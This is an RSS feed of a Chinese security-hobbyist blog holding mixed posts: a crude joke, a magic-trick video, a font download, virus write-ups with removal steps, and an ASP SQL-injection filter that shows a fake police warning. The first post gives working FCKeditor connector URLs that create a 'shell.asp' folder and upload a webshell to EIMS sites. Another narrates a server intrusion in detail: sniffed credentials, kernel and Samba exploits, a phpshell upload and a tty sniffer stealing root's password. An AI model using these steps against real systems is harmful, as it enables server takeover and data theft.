<?xml version="1.0" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="css/rss.xslt"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>叶子's blog - 乱七八糟/Messy</title><link>http://yezishell.cn/</link><description>叶子的博客|关注网络安全！关注网络技术！关注SEO优化！ - </description><generator>RainbowSoft Studio Z-Blog 1.8 Walle Build 100427</generator><language>zh-CN</language><copyright>CopyRight 2009 叶子's blog　  鲁ICP备09016725号　　</copyright><pubDate>Mon, 06 Sep 2010 01:44:15 +0800</pubDate><item><title>EIMS 编辑器漏洞</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/messy/365/</link><pubDate>Wed, 17 Mar 2010 04:01:39 +0800</pubDate><guid>http://yezishell.cn/messy/365/</guid><description><![CDATA[<p>具体利用方法<br />他是分2.1 2.0 俩个版本&nbsp;&nbsp; 企业信息管理系统 eims_for_access_2.1&nbsp; 房产中介管理系统 eims_house_for_access_2.1</p><p>利用方法贴出<br />2.1版本<br />第一步 建立SHELL.ASP文件夹<br />/Include/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&amp;Type=Image&amp;CurrentFolder=%2Fshell.asp&amp;NewFolderName=z&amp;uuid=1244789975684<br />FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&amp;CurrentFolder=/&amp;Type=Image&amp;NewFolderName=shell.asp</p><p>第二个 上传文件<br />/Include/FCKeditor/editor/filemanager/connectors/test.html#</p><p><br />2.0&nbsp; 只是在Fck在跟目录<br />FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&amp;Type=Image&amp;CurrentFolder=%2Fshell.asp&amp;NewFolderName=z&amp;uuid=1244789975684<br />FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&amp;CurrentFolder=/&amp;Type=Image&amp;NewFolderName=shell.asp</p><p><br />FCKeditor/editor/filemanager/connectors/test.html#</p><p>同理</p>]]></description><category>乱七八糟/Messy</category><comments>http://yezishell.cn/messy/365/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=365</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=365&amp;key=d12ff676</trackback:ping></item><item><title>山里人与酒店小姐的对话</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/messy/342/</link><pubDate>Tue, 23 Feb 2010 04:29:21 +0800</pubDate><guid>http://yezishell.cn/messy/342/</guid><description><![CDATA[<p>山里人 :喂.小姐,馍多少钱? <br />服务员 :摸.100! <br />山里人:下面呢？ <br />服务员：下面200！ <br />山里人:我晕！不是吧!?那水饺呢? <br />服务员 :睡觉,400. <br />山里人:一碗400?! <br />服务员:不.一晚800. <br />山里人:我倒！这么贵！为什么一碗要800?</p><p><br />服务员:整晚的，都这价,大哥. <br />山里人:要是不在这里带走呢？ <br />服务员：带出去要1000 <br />山里人：我X！深圳消费也他妈太贵了吧？水饺带出去的更贵。 <br />&nbsp;</p>]]></description><category>乱七八糟/Messy</category><comments>http://yezishell.cn/messy/342/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=342</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=342&amp;key=b5f01c51</trackback:ping></item><item><title>刘谦春晚魔术揭秘视频（春晚视频放慢10倍）</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/messy/338/</link><pubDate>Sat, 20 Feb 2010 13:03:09 +0800</pubDate><guid>http://yezishell.cn/messy/338/</guid><description><![CDATA[<p>春晚大家都看了吧。 一定对刘谦的魔术疑惑不解。。</p><p>大家都知道那是假的&nbsp; 可是看春晚的时候&nbsp; 肯定也在感叹 刘谦假的也太真了。</p><p>网上找了一个视频 是春晚视频放慢了10倍。终于知道了&nbsp; 他是如果瞒过千千万万的观众的 怎么把硬币传透玻璃</p><div>&nbsp;</div><div>记得中间有一段</div><div>桌子上三个硬币</div><div>刘谦手从桌子下面一拍</div><div>桌子上剩下两个</div><div>刘谦手里一个</div><div>其实桌子上还是三个</div><div>不过有两个黏在一起了</div><div>硬币是特制的</div><div>刘谦手里早就藏好了一个</div><div>纯属手法</div><div>边上那几个全是托</div><div>演技太烂了</div><div>话不多说上视频</div><p><embed height="300" width="400" src="http://www.tudou.com/v/HdX0C1BixsY" type="application/x-shockwave-flash" play="true" loop="true" menu="true"></embed></p>]]></description><category>乱七八糟/Messy</category><comments>http://yezishell.cn/messy/338/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=338</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=338&amp;key=99a5ec07</trackback:ping></item><item><title>自己认为最好，才是最好</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/messy/336/</link><pubDate>Thu, 18 Feb 2010 20:03:14 +0800</pubDate><guid>http://yezishell.cn/messy/336/</guid><description><![CDATA[<p><embed menu="true" loop="true" play="true" type="application/x-shockwave-flash" src="http://player.youku.com/player.php/sid/XMTE5MDY2OTA4/v.swf" width="500" height="400" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></p>]]></description><category>乱七八糟/Messy</category><comments>http://yezishell.cn/messy/336/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=336</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=336&amp;key=3c6792d8</trackback:ping></item><item><title>宅男黑客放出“死亡问答” 安全公司迅速跟进</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/messy/284/</link><pubDate>Mon, 12 Oct 2009 06:51:16 +0800</pubDate><guid>http://yezishell.cn/messy/284/</guid><description><![CDATA[<div style="padding-bottom: 0px; padding-left: 10px; padding-right: 10px; display: block; padding-top: 0px" id="NewaspContentLabel" class="ContentFont"><font style="font-family: 宋体, Verdana, Arial, Helvetica, sans-serif; font-size: 14px" id="font_word"><b>1.&ldquo;死亡问答&rdquo;(Sola)宅男病毒，神秘病毒感染数万文件!</b><p>　　大家是否见过感染图片的病毒呢?国庆前夕，有不少用户反映，数码相机中的照片被病毒感染，所有JPG文件都变成了EXE文件。到底这个病毒是如何感染图片的呢?又有哪些危害?贝壳安全网带大家走近科学，走近&rdquo;死亡问答&rdquo;(Sola)宅男病毒。</p><p>　　<b>2.神秘病毒大显神通，数码照片惨遭感染</b></p><p>　　9月27日，原本平静的&ldquo;贝壳意见反馈群&rdquo;被一张图片打破了沉默了。</p><p style="text-align: center" align="center">　　</p><p>　　如此壮观的画面，让各潜水用户纷纷冒泡，询问有什么事情发生。</p><p style="text-align: center" align="center">　　</p><p>　　据了解，该用户正打算将数码相机的内存卡连接到笔记本电脑上。结果在打开的同时，病毒突然启动，瞬间感染所有数码相片，JPG文件全数变成EXE文件。他机器上的杀软仅能隔离病毒，却无法清除病毒，也无法恢复原来的照片。最后该用户在贝壳工程师的帮助下，成功清除了病毒，恢复了照片。</p><p>　<b>　3.宅男的逆袭，死亡问答触目惊心</b></p><p>　　病毒在第一次执行的时候，会建立%sola%\RunTime.txt文件，并且记录执行次数。当累计执行次数达到50的时候，病毒会死锁计算机，删除系统关键文件，导致用户一旦重新启动计算机，便无法再次进入系统。随后屏幕便会出现下面画面。</p><p style="text-align: center" align="center">　　</p><p>　　作者声称制作此病毒是为了报复广电总局对动漫和游戏的歧视性政策。在留言的最后，病毒作者为了不误伤同样爱好动漫和游戏的网友，给出两份考题，一份与动漫相关，另一份与游戏相关。回答正确，病毒会自我清除，并且修复系统，否则进一步破坏系统，使用户不得不重新安装计算机。</p><p>　　所有问题均摘自几款在宅男世界视为经典的作品，你能答对多少呢?</p><p>　<b>　4.如何清除&ldquo;死亡问答&rdquo;(Sola)宅男病毒?</b></p><p>　　如果你中了&ldquo;死亡问答&rdquo;(Sola)宅男病毒，用杀毒软件只能查出病毒，但无法恢复被感染图片文件。目前唯一能恢复图片的解决方案，是使用贝壳的《&ldquo;死亡问答&rdquo;(Sola)宅男病毒专杀工具》。</p><p>　　《&ldquo;死亡问答&rdquo;(Sola)宅男病毒专杀工具》能彻底查杀&ldquo;死亡问答&rdquo;(Sola)宅男病毒，恢复被感染文件。请您立即下载专杀工具，检测系统是否已经感染该病毒。</p><p>　<b>　5.&ldquo;死亡问答&rdquo;(Sola)宅男病毒危害性</b></p><p>　　病毒会感染用户近期打开过的DOC，TXT，JPG文件，使之全部变成EXE文件。在病毒执行次数累计超过50的时候，死亡问答便会被激活，同时锁定系统，删除NTLDR(全称是NT Loader，是系统加载程序)。若用户回答问题正确，病毒恢复NTLDR，并且进入自我清除模式。若用户回答失败，则需重装系统。</p></font></div>]]></description><category>乱七八糟/Messy</category><comments>http://yezishell.cn/messy/284/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=284</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=284&amp;key=ed2e3dac</trackback:ping></item><item><title>吓住黑客入侵者的代码</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/messy/281/</link><pubDate>Fri, 09 Oct 2009 23:24:30 +0800</pubDate><guid>http://yezishell.cn/messy/281/</guid><description><![CDATA[<div>以下是ASP代码，并且使用了ip地址归属地查询。<br /><br />--------------------------------------------------------------------------------------------------------------------------<br />&lt;%<br />　　Sub StopInjection_it_security(Values)<br />　　Dim regEx<br />　　Dim IP<br />　　Set regEx = New RegExp<br />　　regEx.IgnoreCase = True<br />　　regEx.Global = True　<br />　　regEx.Pattern = &quot;'|;|#|([\s\b+()]+(<a href="mailto:select|union|update|insert|delete|declare|@|exec|dbcc|al</div><div>ter|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin|retun|as|go|exists)[\s\b">select|union|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and</div><div>|or|add|set|open|close|use|begin|retun|as|go|exists)[\s\b</a>+]*)&quot;<br />　　If regEx.Test(Values) Then<br />　　IP = Request.ServerVariables(&quot;HTTP_X_FORWARDED_F&quot;)<br />　　IF(IP=&quot;&quot;)THEN IP = Request.ServerVariables(&quot;REMOTE_ADDR&quot;)<br />　　response.write(&quot;&lt;span name=addr id=addr&gt;&lt;/span&gt;&quot;)<br />　　response.write(&quot;&lt;script src=http://whois.pconline.com.cn/jsLabel.jsp?ip=&quot; &amp; IP &amp;&quot;&amp;id=addr&gt;&lt;/script&gt;&quot;)<br />　　Response.Write &quot;&lt;script&gt;alert('北京海淀网络**局警官张无(13021)提醒你：\n◇来自:'+document.getElementById('addr').innerHTML +' 的朋友\n◇你的非法访问已经被记录\n★非法IP=&quot; &amp; IP &amp; &quot;\n★请保持手机畅通，恭候**部门调查！')&lt;/script&gt;&quot;<br />　　Response.End<br />　　End If<br />　　<br />　　Set regEx = Nothing<br />　　End Sub　　<br />　　%&gt;</div>]]></description><category>乱七八糟/Messy</category><comments>http://yezishell.cn/messy/281/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=281</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=281&amp;key=87162940</trackback:ping></item><item><title>渗透国内某网络游戏服务器群记实</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/messy/277/</link><pubDate>Sun, 04 Oct 2009 17:20:37 +0800</pubDate><guid>http://yezishell.cn/messy/277/</guid><description><![CDATA[<p>现在想弄钱的入侵者，似乎热衷于入侵网络游戏服务器，盗出游戏服务器程序或是数据库。国内的网络游戏企业，都应该招受过此损失，有暴露出来的，有没暴露出来的。但游戏企业对安全问题理解都十分片面，狭隘!<br />　　<br />　　当然，不只是网络游戏企业。近一两年来，入侵者乐此不疲，各种商业数据的偷盗在国内几乎快形成一种&quot;圈内产业&quot;。不论是技术性还是行事组织性都与 早年不可同日而语。需求与供应在这里似乎有着完美结合。再看看各地公安网监部门，媒体似乎每天都有报道关于某地公安抓获某黑客的事件。但却似乎没有一起真 正成熟的案件。抓到的都是小鱼，大鱼都在偷着乐。原因有没发现没报案的，也有网监部门的技术问题。还有就是官僚主义，公安部门发布所谓的&ldquo;战果&rdquo;也乐此不 疲。<br />　　<br />　　话不说远了，转入正题。<br />　　<br />　　一个好友在国内某网络游戏企业工作，让我帮忙测试他们游戏服务器群的安全性。加上我这段时间闲得无聊，也就答应了。<br />　　<br />　　我先下载了游戏客户端程序，得到到了几个游戏服务器的地址。<br />　　游戏帐号在WEB网站上也可以注册，看来游戏中央数据库的调用WEB网站也可以。<br />　　先仔细的检查了一下WEB网站，大部分是PHP+MYSQL的。代码写得还不错，几乎找不到什么突破口。再看看MYSQL，禁止远程连接。查看了其他游戏 服务器，都是LINUX系统，都只是开了OPENSSH和游戏服务器程序端口。只有WEB网站多个80，而又没什么可利用的地方。<br />　　<br />　　看上去安全做得不错，但这是种幻象！<br />　　<br />　　随后仔细分析了下游戏客户端程序，我打开Sniffer Pro以便记录下客户端程序和服务器的所有通信。发现客户端程序有个自动更新功能，我Sniff到是通过FTP去下载更新文件的。但我扫描所有游戏服务器 时没发现这个FTP端口啊（8888）。仔细看了一下，原来这个端口连接延时十分长。所以扫描器没发现这个端口。<br />　　<br />　　意外的从更新过程中，竟然Sniff到一个固定的更新程序的FTP帐户。检查了FTP服务器是ProFTPd，我没直接用这个帐户去溢出ProFtpd。因为这台服务器开了SSH，我直接拿帐户去登陆SSH，获得一个权限极低的shell。<br />　　<br />　　就像一块布，一但撕开一丁点口子，只要稍一加力，整块布都会随之撕开!<br />　　<br />　　在系统中寻觅了半天，终于寻找到一个有权限去写的tmp目录。查看了内核版本，用kernel do_brk()的问题溢出提升权限获得了rootshell，没去装rkt，因为只是帮忙测试.<br />　　<br />　　检查了系统的路由表，发现有一个内网，最后确认是VPN，原来所有游戏服务器之间的连接是通过VPN，防火墙的信任检查，都是通过内网的IP地址。外网访问这些服务器都只能看到22端口和游戏服务程序端口。<br />　　<br />　　在这台已控制的服务器上下载了一个nmap，扫描了其他服务器，发现其中一台开了Samba,查看了一下版本，存在问题。溢出并获得了rootshell。<br />　　<br />　　到现在为止以控制两台服务器，我把两台服务器的shadow文件都弄回来，拿jonh跑了一遍，没什么弱智密码。看来密码还设得挺好的。<br />　　<br />　　逛尤了一会，在开了Samba的服务器上，发现了游戏服务器程序。并随之在game.conf文件中发现了中央数据库的地址和一个数据库帐户。登上去看了一下，数据库太庞大，放弃了dump出来的念头。<br />　　<br />　　好象没有必要去分析游戏服务器程序，找出vul，去exp，来撕开其他服务器<br />　　<br />　　但从其中的一个名为&quot;weihu&quot;的table中，发现一个后台管理帐户和密码，这个密码大小写互换加数字加符号。<br />　　<br />　　我在web网站上找到一个后台入口，并用在数据库得到的帐户登陆成功。发现后台管理系统中有一个上传的功能，而且没检查文件后缀名。存放文件目录也是在web目录之下。上传了一个phpshell,执行命令成功，随后我又获得提升权限为root的shell。<br />　　<br />　　发现这台机器上还有个root在上面工作，但正在专注用vi编辑一个文件。没发现我。但我想到一个恶作剧。我给这台web网站服务器装了个能监视 tty输入的sniff，随后又skill了那个root，那个root被踢下去没多久，又登陆上来。但我立马就抓到了他的密码。<br />　　<br />　　我用这个抓到的密码去登陆其他服务器的SSH，并也用root帐户，都登陆成功。<br />　　<br />　　感觉所有服务器的系统都应该是直接拷的盘，因为系统版本和所安装的程序和一些配置大都相同。<br />　　<br />　　至此已经控制游戏服务器群的所有服务器，其中还有一台是SMS网关。<br />　　<br />　　我们的游戏时间结束。只是因为一个小问题，最后导致整个服务器群被控制，其实这在安全问题上，这是必然会发生的。安全无小事!<br />　　<br />　　其实这家企业对安全也有投入，硬件防火墙，支持VPN的。但因为一个程序自动更新的设计上的小失败。导致一切都虚设。<br />　　<br />　　随后我把整个过程告诉了我那朋友，听得他立马向他们主管汇报了问题。</p><center></center>]]></description><category>乱七八糟/Messy</category><comments>http://yezishell.cn/messy/277/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=277</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=277&amp;key=c4651dfa</trackback:ping></item><item><title>QQ1000官方消息的钓鱼</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/messy/263/</link><pubDate>Thu, 24 Sep 2009 17:39:04 +0800</pubDate><guid>http://yezishell.cn/messy/263/</guid><description><![CDATA[<div class="ContentFont" id="NewaspContentLabel" style="padding-right: 10px; display: block; padding-left: 10px; padding-bottom: 0px; padding-top: 0px"><font id="font_word" style="font-size: 14px; font-family: 宋体, Verdana, Arial, Helvetica, sans-serif">QQ弹出的官方消息，很多人都会深信不疑吧？可一定要小心！因为<b>病毒也可以伪造QQ官方消息</b>。<p>　　病毒类型：广告病毒<br />　　病毒目的：进行网络钓鱼</p><p>　　<b>真实体验：QQ官方消息也有假？</b></p><p>　　QQ10000，也就是大家常说的QQ官方消息专用号码。它代表QQ官方，所以大家都相信它里面的内容。如果QQ官方消息里面含有钓鱼网站，大家因为信任QQ官方而访问，就很可能上当受骗。</p><p>　　各位兄弟姐妹，你们碰到过弹出伪造QQ官方消息的病毒没有?反正我是遇到过，还被它雷得外焦里嫩，下面就要给大家说说。几天前，我正在网上看甲型H1N1流感的新闻，QQ的小喇叭就闪动起来。打开一看，是一个中奖消息(图1)。</p><p align="center"><img alt="" src="http://yezishell.cn/upload/200909241740062327.jpg" onload="return imgzoom(this,550)" border="0" /></p><p>　　第一反应是怀疑，这个消息到底是真是假?再仔细看时，发现这条消息是QQ10000发来的，是QQ的官方消息。或许我真的中奖了?!腾讯十周年庆典，我成为了幸运用户，我的运气不是一般的好。</p><p>　　我兴奋地点击了&ldquo;查看详情&rdquo;登录了领奖网站，中奖QQ网友的名单在不断地滚动，其中就有我的QQ号码。在网页中领奖区域，输入了自己的QQ号码和幸运码，系统提示我中奖信息验证成功。</p><p>　　不过，系统也提示要领取奖品还需要缴纳一笔1500元的公证费。看到这里，我才反应过来，这个网站有问题。腾讯说过&ldquo;腾讯公司所有的中奖活动都会在官方主页上进行公布。对于参加腾讯公司活动中奖的用户，腾讯公司不会收取任何费用&rdquo;。此外，QQ官方还时常弹出消息要大家不要相信所谓的中奖信息。</p><p>　　以前，我的QQ和邮箱经常收到所谓的中奖链接，开始的时候还会点击这些链接，发现都是骗人的，后来就直接忽视它们。这次如果我不是信任QQ官方消息，根本不会点击中奖链接，险些上当。</p><p>　<b>　病毒是怎样伪造QQ</b><b>官方消息的？</b></p><p>　　为什么会弹出假冒的QQ官方消息?我怀疑自己的<a class="fllink" href="http://yezishell.cn/upload/200909241740063042.jpg" target="_blank"><img style="border-left-color: #000000; border-bottom-color: #000000; border-top-color: #000000; border-right-color: #000000" alt="点击放大此图片" src="http://yezishell.cn/upload/200909241740072275.jpg" onload="return imgzoom(this,550)" border="1" /></a></p><p>　　病毒原理：病毒通过木马下载器进入系统后，会在同一个目录里面释放批处理jcreate.bat，通过它可以关闭《360安全卫士》的进程，接着将病毒文件复制到系统的system32目录中并命名为winlegon.exe。</p><p>　　通过病毒名称可以看出，病毒将自身文件伪装成系统文件winlogon.exe，然后将各个监控项目的设置信息修改成&ldquo;关闭&rdquo;，最后添加自身到注册表的Run启动项，从而实现病毒随机启动的目的。</p><p>　　病毒加载完成以后，会在系统进程中查找QQ的进程。如果查找到有QQ进程，则继续查找QQ软件在右下角的图标，然后模拟一个QQ消息，将病毒文件里面的内容弹出，引诱用户点击进入钓鱼网站里面。</p><p>　　<b>严防死守 让QQ不弹假消息</b></p><p>　　第一步：该病毒自保能力不强，可以先考虑用杀毒软件来对付。启动杀毒软件病并确保病毒库是最新的，然后进行全盘查杀。如果该病毒进行过很厉害的免杀，你的杀毒软件什么也没有发现，就继续以下的操作。</p><p>　　第二步：运行进程管理工具Wsyscheck(下载地址：upload/200909241740077666.jpg" target="_blank"><img style="border-left-color: #000000; border-bottom-color: #000000; border-top-color: #000000; border-right-color: #000000" alt="点击放大此图片" src="http://yezishell.cn/upload/200909241740088737.jpg" onload="return imgzoom(this,550)" border="1" /></a></p><p>　　第三步：点击Wsyscheck中的&ldquo;安全检查&rarr;活动文件&rdquo;，选择病毒的启动项winlegon.exe，点击右键选择&ldquo;修复所选项&rdquo;即可(图4)。点击Wsyscheck中的&ldquo;文件管理&rdquo;标签，在系统的system32目录中找到病毒文件winlegon.exe，点击右键选择&ldquo;直接删除&rdquo;命令即可。</p><p align="center"><a href="http://yezishell.cn/upload/200909241740082007.jpg" target="_blank"><img style="border-left-color: #000000; border-bottom-color: #000000; border-top-color: #000000; border-right-color: #000000" alt="点击放大此图片" src="http://yezishell.cn/upload/200909241740086836.jpg" onload="return imgzoom(this,550)" border="1" /></a></p></font></div><div>&nbsp;</div>]]></description><category>乱七八糟/Messy</category><comments>http://yezishell.cn/messy/263/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=263</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=263&amp;key=015bf1f0</trackback:ping></item><item><title>'提权'不仅仅是文件权限上的问题</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/messy/255/</link><pubDate>Wed, 16 Sep 2009 21:52:38 +0800</pubDate><guid>http://yezishell.cn/messy/255/</guid><description><![CDATA[<div class="ContentFont" id="NewaspContentLabel" style="padding-right: 10px; display: block; padding-left: 10px; padding-bottom: 0px; padding-top: 0px"><font id="font_word" style="font-size: 14px; font-family: 宋体, Verdana, Arial, Helvetica, sans-serif">我们一般的提权方式都是从文件系统入手，也就是我们常说的NTFS权限方面。我认为，这应该是一个误区，如果你越是深入的专注于文件系统，那么后面的路将会非常艰辛<br /><br />文件系统是构造一个操作系统所必需的，但是提权是操作系统的权限，而不是仅仅的一个'文件系统'<br /><br />自然如果是一名刚入门的网友了解或学习这方面的知识，那么文件系统将会是您必须入手的部分，但是也请不要将文件系统归纳为就等同于系统的提权。所说的&lsquo;文件系统&rsquo;，简而言之就是方便对我们的文件进行操作管理，同时随文件系统的深入，也涉入了权限之中，这可能便是我们所说的那一个误区<br /><br />某次我在对一个国外的shell进行提权测试的时候，发现对方的Manager在文件权限上作的非常好，甚至可能是对于当时的我来说无懈可击了，我曾经以为那是一个不可攻克的目标，我尝试了关于文件系统方面所有的方法，都一一失败的了，如果说有一种新的方法那么这将是突破一些的利箭。方法往往都很简单，其实只是误区将我们带入了绝境。<br /><br />这里我们阐述的只是关于文件系统这样的一个误区，具体的方面并没有公布，此文仅仅告诉大家不要过分专注于文件系统方面的提权 </font></div><div>&nbsp;</div>]]></description><category>乱七八糟/Messy</category><comments>http://yezishell.cn/messy/255/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=255</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=255&amp;key=41e0b42d</trackback:ping></item><item><title>微软雅黑字体 for XP</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/messy/250/</link><pubDate>Sun, 13 Sep 2009 22:14:42 +0800</pubDate><guid>http://yezishell.cn/messy/250/</guid><description><![CDATA[<p><font size="2"><img alt="" border="0" src="http://yezishell.cn/upload/200909132216383320.gif" /></font></p><p><p>&nbsp;</p><p><a target="_blank" href="http://ydsoft.greendown.cn//200811/MS-VistaFont_CHS_6.0_Setup_FIX2%28nnf1%29.rar">点击下载</a></p><p>哎 太穷了. 挂外连吧&nbsp; 等空间大了 全拉回来...</p></p><p>微软雅黑字体 6.0 最新版 - 安装版<br />基于最新系统win7里提取的两款雅黑字体封装制作，包括 msyh.ttf(微软雅黑)6.0版、msyhbd.ttf(微软雅黑粗体)5.0版(帆帆修正版,修正间隔号BUG) 两个字体文件，以及整合了本人刚刚汉化制作的 ClearType v1.03(修正以往汉化版本若干处语句的翻译，汉化更准确更完整)。采用静默安装模式，运行软件即自动将字体文件和 ClearType 安装到系统中，并自动启动 ClearType 对字体显示效果进行设置。<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 若要使用微软雅黑字体，在安装字体后，还要开启ClearType效果，然后才能把微软雅黑字体应用到IE浏览器、应用到系统字体，以及输入法使用、文档浏览等。具体使用方法可以搜索互联网。若卸载微软雅黑字体请进入系统的字体文件夹手动删除相应的字体文件。<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 微软雅黑是微软委托方正公司开发一个ClearType字体。msyh.ttf 标准|msyhbd.ttf 粗体，最新的6.0提取自Windows 7。修正了5.0的字符对齐等许多问题。</p><p>文件名：微软雅黑V6.0修正版(静默安装包)(nnf1).exe&nbsp;</p>]]></description><category>乱七八糟/Messy</category><comments>http://yezishell.cn/messy/250/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=250</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=250&amp;key=213bf971</trackback:ping></item></channel></rss>
